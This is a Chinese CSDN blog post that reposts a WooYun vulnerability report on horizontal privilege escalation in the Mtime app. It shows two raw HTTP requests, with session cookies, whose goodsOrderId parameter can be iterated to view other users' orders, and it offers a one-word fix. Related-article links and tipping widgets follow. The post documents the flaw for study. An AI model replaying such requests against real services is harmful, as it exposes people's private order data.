【漏洞学习——越权】Mtime时光网越权查看订单

最新推荐文章于 2021-03-08 18:01:30 发布
最新推荐文章于 2021-03-08 18:01:30 发布
阅读量623 收藏
点赞数
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84753285
版权

漏洞细节

时光网app下载地址 http://feature.mtime.com/mobile/
测试的是ios客户端

有两处接口可越权遍历订单
#1 

GET /ECommerce/GoodsOrderInfo.api?goodsOrderId=7708428 HTTP/1.1
Host: api.m.mtime.cn
X-MTime-Mobile-CheckValue: 5,1462780658496,80CB2F439C0F418EB3CBD657223B3620
Proxy-Connection: keep-alive
Accept-Encoding: gzip
Cookie: loginEmail=wooyun_222%40163.com; autoExit=; _mi_=411530972117512131043048311531065.16050915425546866C52C46202E4F5FA1B36
Connection: keep-alive
X-Mtime-Mobile-DeviceInfo: iPad3,5
User-Agent: Mtime iOS App 9.2.4

遍历 goodsOrderId

#2 

GET /Service/callback.mi/ECommerce/GoodsOrderGroupInfo.api?goodsOrderId=7708418&t=2016591604916857 HTTP/1.1
Host: mall.wv.mtime.cn
Referer: http://mall.wv.mtime.cn/
X-Requested-With: XMLHttpRequest
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn
Cookie: Hm_lpvt_e07949f61338e36deb5fc85107e6157b=1462780847; Hm_lvt_e07949f61338e36deb5fc85107e6157b=1462779830,1462780411; _mi_=411530972117512131043048311531065.16050915425546866C52C46202E4F5FA1B36; _tt_=57303f6300fc8c3796a0da61; loginEmail=wooyun_222%40163.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 Mtime_iPhone_Showtime_Hybird/9.2.4(WebView Width 320 Height 568) (Device iPad3,5)

遍历 goodsOrderId

修复建议:

鉴权

参见:https://bugs.shuimugan.com/bug/view?bug_no=206705

 

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB安全新玩法 [5] 防范水平越权查看他人订单信息
天存信息
09-29 711
水平越权是指系统中的用户在未经授权的情况下,查看到另一个同级别用户所拥有的资源。水平越权会导致信息泄露,其产生原因是软件业务设计或编码上的缺陷。iFlow 业务安全加固平台可以缓解部分场景下的水平越权问题。 以某电商站为例,其查看订单功能存在漏洞:仅依靠修改 URL 参数,任意登录用户不仅可以查看自己的订单信息,也可以查看到其他用户的订单信息。我们看看在站自身存在缺陷的情况下,如何利用 iFlow 阻止水平越权订单信息访问。 一、原始站 1.1 正常用户访问 正常用户登录成功之后,进入个人中心的订
越权漏洞学习
ad12456的博客
03-28 810
越权漏洞
站内容管理系统--CMS相关漏洞复现
weixin_52263461的博客
03-08 1929
cmseasy7.3.8–文件读取漏洞复现步骤 首先准备一套源码,搭建在phpstudy中。 在php中 Mysql中创建cmseay7数据库 3. 再将准备好的源码,解压放到站根目录 登录后台 账号:root 密码:root 进入到管理页面 --------------------模板--------------编辑模板----------------- 观察模板编辑功能,存在对模板的html文件的读取(查看)操作,对应到http请求可以明显看到可控参数。 开启bp抓包,进行查看
络数据API
郭宝的博客
03-01 2932
时光 正在热映 url:https://api-m.mtime.cn/Showtime/LocationMovies.api?locationId=? 示例url:https://api-m.mtime.cn/Showtime/LocationMovies.api?locationId=290 JSON数据: { "bImg": "http://img5.mtime.c...
时光接口文档
10-03
时光接口文档1
10-03
1.1执行摘要;1.2编写目的;1.3特殊记号格式说明;1.4抓包的方法使用Wireshark 脚本 2接口说明;2.1接入方式;2.2接入地址; 3.HOME首页接口; 4.1 购票 电影 正在热映数据 5.发现页面 6.商城 7、全球票房榜 7、北美 香港,台湾,日本,韩国 ,预告片,排行榜
越权漏洞
sc_Pease的博客
12-25 501
越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广、危害大,被OWASP列为Web应用十大安全隐患的第二名。 该漏洞是指应用在检查授权时存在纰漏,使得攻击者在获得低权限用户账户后,利用一些方式绕过权限检查,访问或者操作其他用户或者更高权限。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定,一旦权限验证不充分,就易致越权漏洞。 摘录自站:http://www.mchz.com.cn
Mtime时光
05-14
Mtime时光
Mtime时光私信发送器
05-05
【Mtime时光私信发送器】是一款专为Mtime时光用户设计的工具,用于自动化地发送私信。在互联社交平台中,私信功能是用户之间进行私人交流的重要方式,而Mtime时光作为知名的电影资讯和社区平台,其用户群体...
mtime时光宽屏焦点图.zip
最新发布
11-24
这个项目可能是为mtime时光设计的一个宽屏焦点图组件,通常用于站主页,展示电影、电视剧或其他内容的高清大图,并且具有动态切换效果,增强用户体验。 1. **CSS**:在页设计中,CSS(Cascading Style Sheets...
mtime时光宽屏焦点图
04-07
该组件利用了流行的JavaScript库——jQuery,为用户带来流畅、动态的2014年mtime时光首页风格的焦点图切换效果。这个效果在页设计中十分常见,能够吸引用户的注意力,提升站的整体视觉体验。 jQuery是...
jquery 2014 mtime时光首页宽屏焦点图切换效果代码
11-17
【jQuery 2014 mtime时光首页宽屏焦点图切换效果详解】 在页设计中,焦点图(也称为幻灯片或轮播图)是一种常见的元素,它能够以动态方式展示多张图片或内容,增加站的视觉吸引力。jQuery 是一个广泛使用的 ...
小程序第三方插件-代码封装&&wxParse&&web-view
蜗牛~~
08-20 1095
增强编译 在 1.02.1904282 以及之后版本的开发工具中,增加了增强编译的选项来增强ES6转ES5的能力,启用后会使用新的编译逻辑以及提供额外的选项供开发者使用。 首先在详情中的本地设置里面先设置一下增强编译: 开启以后,就可以使用async和await去获取数据,可以代替通过then来调用接口的方式,显然下面这种方式简化很多代码: //开启增强编译 使用async和awa...
渗透测试-越权查询漏洞
道阻且长,行则将至。
08-08 4221
背景介绍 钻石代理商马春生同学卷款逃跑,多位下级代理内心受到了难以磨灭的伤害,为了找到她我们将通过代理站获取到她的手机号码等信息。 实训目标 1.了解越权漏洞的相关知识; 2.熟练的使用burp工具获取用户信息; 3.掌握一定的前端知识; 解题方向 越权访问,遍历用户信息。 靶机平台 墨者学院——身份认证失效漏洞实战: https://www.mozhe.cn/bug/detail/eUM3Sk...
看了你就会的OkHttp(一)
常灿光的博客
12-22 6953
1:OKHttp介绍1.1简介OKHttp是一款高效的HTTP客户端,支持连接同一地址的链接共享同一个socket,通过连接池来减小响应延迟,还有透明的GZIP压缩,请求缓存等优势,其核心主要有路由、连接协议、拦截器、代理、安全性认证、连接池以及络适配,拦截器主要是++指添加,移除或者转换请求或者回应头部信息
最近影讯api数据库整合分享
weixin_30627381的博客
10-10 710
最近影讯api,影视信息播放链接检索,城市影讯检索。 接口名称:最近影讯api 接口平台:聚合数据 接口地址:http://op.juhe.cn/onebox/movie/pmovie 支持格式:json/xml 请求方式:HTTPGET/POST 请求示例:http://op.juhe.cn/onebox/movie/pmovie?key=APPKEY&city=%E8%8...
api接口的记录
weixin_30732487的博客
12-14 216
http://tingapi.ting.baidu.com/v1/restserver/ting?method=baidu.ting.billboard.billList&type=1&size=100&offset=0参数: type = 1---新歌榜(100),2---热歌榜(100),14---影视金曲榜(100),15---港台(78),16---流行(100)...
漏洞学习——SSRF】腾讯某处SSRF漏洞(非常好的利用点)附利用脚本
Fly_鹏程万里
02-22 6651
漏洞细节 ## 1. 描述 本文章将概述一些经典的SSRF漏洞利用原理,从Fuzz扫描开放的服务到漏洞的自动化利用,刚好腾讯的这个漏洞点,非常适合做为案例来演示。### 1.1 漏洞信息 > 腾讯微博应用  > http://share.v.t.qq.com > SSRF利用点,参数: url > http://share.v.t.qq.com/index.php?c=s...
阿铭Linux基础学习教程:从入门到精通
9. 时间属性:atime、mtime、ctime的含义及查看方法。 10. 软硬链接:理解链接的概念,创建和管理链接文件。 11. 用户和组管理:包括用户和用户组的创建、删除及属性修改。 12. passwd命令:修改用户密码的命令详解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值